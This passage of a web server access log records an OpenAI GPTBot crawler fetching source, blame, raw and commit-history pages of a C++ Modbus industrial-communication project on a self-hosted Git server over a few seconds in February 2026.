+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13018] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11308] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src" [Client 74.7.227.38] [Length 10128] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:16:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 10159] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:16:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 21546] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:16:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" [Client 74.7.227.38] [Length 9920] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" -[17/Feb/2026:16:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 5832] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:16:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 10153] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:16:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:16:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" [Client 74.7.227.38] [Length 16026] [Gzip 9.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" -[17/Feb/2026:16:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 5469] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:16:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" [Client 74.7.227.38] [Length 9919] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" -[17/Feb/2026:16:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:16:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" -[17/Feb/2026:16:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 11631] [Gzip 5.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:16:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 22862] [Gzip 12.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:16:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" [Client 74.7.227.38] [Length 20512] [Gzip 12.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" -[17/Feb/2026:16:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:16:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 10186] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:16:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 12225] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:16:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 14186] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:16:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 11139] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:16:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" [Client 74.7.227.38] [Length 6497] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" -[17/Feb/2026:16:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10077] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:16:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 12254] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:16:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 610] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:16:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 14215] [Gzip 7.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:16:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src" [Client 74.7.227.38] [Length 10155] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:16:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 11603] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:16:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 610] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:16:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:16:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:16:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:16:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 10162] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:16:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:16:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:16:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 14187] [Gzip 7.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:16:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:16:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:16:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 11168] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:16:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 14213] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:16:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:16:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11815] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10517] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 